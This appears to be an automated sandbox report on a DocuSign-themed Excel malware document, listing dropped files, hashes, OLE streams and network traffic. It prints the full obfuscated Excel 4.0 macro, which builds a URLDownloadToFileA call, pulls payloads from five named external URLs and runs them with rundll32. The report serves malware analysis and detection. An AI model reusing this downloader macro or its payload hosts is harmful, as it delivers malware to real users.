SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-447781983-02182021.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Feb 23 21:18:35 2021, atime=Tue Feb 23 21:18:35 2021, length=57856, window=hide
Category:	dropped
Size (bytes):	2208
Entropy (8bit):	4.509683851335049
Encrypted:	false
SSDEEP:	24:8MK/XTwz6Iknf5er58Dv3qTadM7dD2MK/XTwz6Iknf5er58Dv3qTadM7dV:8MK/XT3Ikf5KzOQh2MK/XT3Ikf5KzOQ/
MD5:	9203DF98B3C77B2611AEF20429FD255B
SHA1:	DC779C5BEB7E48D251C815798CF05DBA7A47BBD6
SHA-256:	D6F29B431FC432CA2EC5BF824F105B3D6216AAD1CA32C89F273C7C99199607E8
SHA-512:	4E3C1A9EFAE63FE1DF7BB7F9596DAE88F6C783D7E1EEE2680877288B4AFEC6B261E0B7B64D770E5DE72A27F02E94539923FF6513AB40835C2E8F4C2531A78D21
Malicious:	false
Preview:	L..................F.... ....H...{.....1...N...1................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WRO. .COMPLA~1.XLS..n.......Q.y.Q.y...8.....................C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\Complaint-447781983-02182021.xls.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 21:18:35 2021, atime=Tue Feb 23 21:18:35 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.471582794308919
Encrypted:	false
SSDEEP:	12:85Q7LgXg/XAlCPCHaXgzB8IB/jkxX+WnicvbLbDtZ3YilMMEpxRljKYtcTdJP9TK:85k/XTwz6IUYeTDv3qTarNru/
MD5:	613B29A0795DDB1F94125C3AEDF76915
SHA1:	2E6108E590FD3983DA23F0BB8C4C2E6124646238
SHA-256:	B27FB4E6350A101B60E8D83633F03823A6402C72B6174A573673069037761914
SHA-512:	DC702753E8346A496B46BC49EF8DA0BA5581F32398E531BF9B6A274A7A63B3A91F544D9F89B8DFDEE4B45C0C54CB284D4BBC95526D3F2CF770428889887DE705
Malicious:	false
Preview:	L..................F...........7G.....1......1....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....WRR...Desktop.d......QK.XWRR...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	137
Entropy (8bit):	4.791427181491947
Encrypted:	false
SSDEEP:	3:oyBVomMYlIiSWcz0FXrl+1lIiSWcz0FXrlmMYlIiSWcz0FXrlv:dj6Yl4ubal4ubxYl4ub1
MD5:	733D335954A7C87A9071F01D9ACBE348
SHA1:	1AE168C09F0041C079663BCD4AB9162F33CD7623
SHA-256:	87A461F640E439196E55DB894090873D4B9F7FC9D895E4DCD13B2346165BA1B6
SHA-512:	04CB3D8787A8BA5A86F04E8162756D4A93DB3A2A8BDEB6E6128376E1EBF2978177B3B0A4986D3723DA6159C39765E5C0E76DE63097CD5A9289E37E1EC141A1E9
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..Complaint-447781983-02182021.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..

C:\Users\user\Desktop\A3CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	88220
Entropy (8bit):	6.550064484764603
Encrypted:	false
SSDEEP:	1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdkfxhoaGzeNmYhQaGzeNmFOYVPDZKz:rP8rmjAItyzElBIL6lECbgBGGP5xLm7O
MD5:	F5DB39B0763E2C2A2CD7540D66D1F3B6
SHA1:	7B9BCDFCF5D4901ABFF534357A3ABACCD66D7BB1
SHA-256:	0FFB0617B00CC2B6214F1E93CED1734C7BA3E1B65799C036A9335A86570ACF88
SHA-512:	1883198C36D6C3DDDDA0FFAFC4B133E5EEA4A7C4C62B1B2641900EAE7461F5C06CAE0E82E6BF9FAC43BB17A87AAAD74571ED5552DA5B37C6F6FDF3C60C244334
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
Entropy (8bit):	3.697666945848156
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	Complaint-447781983-02182021.xls
File size:	145920
MD5:	60f845a847e771a59b97d456c494f69d
SHA1:	bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
SHA256:	c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319
SHA512:	e942975e9b88c1e3783fa7723b8dcaf4cf1acc63e36380a56543ab96393815df27426169d38235790314de18590b0ed1363d38296e3b4a5543dba0f849f103e0
SSDEEP:	3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/V:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Complaint-447781983-02182021.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:	Friner
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-02-18 13:42:21
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.321292606979
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2746714277
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	135085
Entropy:	3.69042254796
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
Data Raw:	09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,

,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 14:19:00.116826057 CET	49165	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:00.273427963 CET	80	49165	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:00.273561001 CET	49165	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:00.274074078 CET	49165	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:00.432146072 CET	80	49165	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:00.738688946 CET	80	49165	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:00.738727093 CET	80	49165	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:00.738888979 CET	49165	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:00.739753962 CET	49165	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:00.896171093 CET	80	49165	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:00.913965940 CET	49166	80	192.168.2.22	162.241.80.6
Feb 23, 2021 14:19:01.073872089 CET	80	49166	162.241.80.6	192.168.2.22
Feb 23, 2021 14:19:01.074083090 CET	49166	80	192.168.2.22	162.241.80.6
Feb 23, 2021 14:19:01.075107098 CET	49166	80	192.168.2.22	162.241.80.6
Feb 23, 2021 14:19:01.235148907 CET	80	49166	162.241.80.6	192.168.2.22
Feb 23, 2021 14:19:01.803869009 CET	80	49166	162.241.80.6	192.168.2.22
Feb 23, 2021 14:19:01.804055929 CET	49166	80	192.168.2.22	162.241.80.6
Feb 23, 2021 14:19:02.145895958 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:02.430927992 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:02.431334019 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:02.431818008 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:02.716201067 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:03.712217093 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:03.712284088 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:03.712413073 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:03.713334084 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:03.723901033 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.009088993 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.009366035 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.024945974 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.314074039 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.315968037 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.316031933 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.316070080 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.316157103 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.316210985 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.316219091 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.325648069 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:04.612622976 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:04.612927914 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:06.252859116 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:06.580133915 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:06.804435015 CET	80	49166	162.241.80.6	192.168.2.22
Feb 23, 2021 14:19:06.804722071 CET	49166	80	192.168.2.22	162.241.80.6
Feb 23, 2021 14:19:08.712454081 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:08.712696075 CET	49167	80	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.313750982 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.313806057 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.313855886 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.313900948 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.313935995 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.313941956 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.313961029 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.313963890 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.313982964 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.314016104 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.314019918 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.314033031 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.314064980 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.314070940 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.314110041 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.314117908 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.314148903 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.314152956 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.314191103 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.322004080 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.322055101 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.329550028 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:09.490185022 CET	80	49172	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:09.490309954 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:09.491547108 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:09.599566936 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599683046 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599721909 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599775076 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599786043 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599801064 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599803925 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599832058 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599834919 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599873066 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599881887 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599925041 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599930048 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.599973917 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.599975109 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600018978 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600023031 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600064993 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600070000 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600111008 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600114107 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600155115 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600158930 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600202084 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600202084 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600243092 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600250006 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600292921 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600297928 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600339890 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600342989 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600379944 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600383043 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600425005 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600429058 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600467920 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600490093 CET	443	49168	138.36.237.100	192.168.2.22
Feb 23, 2021 14:19:09.600507975 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600521088 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.600538969 CET	49168	443	192.168.2.22	138.36.237.100
Feb 23, 2021 14:19:09.652230978 CET	80	49172	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:09.955905914 CET	80	49172	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:09.955979109 CET	80	49172	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:09.956020117 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:09.956079960 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:09.956351995 CET	49172	80	192.168.2.22	72.52.227.180
Feb 23, 2021 14:19:10.116898060 CET	80	49172	72.52.227.180	192.168.2.22
Feb 23, 2021 14:19:10.178258896 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:19:10.329272985 CET	80	49173	68.66.216.42	192.168.2.22
Feb 23, 2021 14:19:10.329473019 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:19:10.330482006 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:19:10.481463909 CET	80	49173	68.66.216.42	192.168.2.22
Feb 23, 2021 14:19:10.805535078 CET	80	49173	68.66.216.42	192.168.2.22
Feb 23, 2021 14:19:10.805726051 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:19:14.445190907 CET	80	49173	68.66.216.42	192.168.2.22
Feb 23, 2021 14:19:14.445420980 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:19:36.804406881 CET	80	49166	162.241.80.6	192.168.2.22
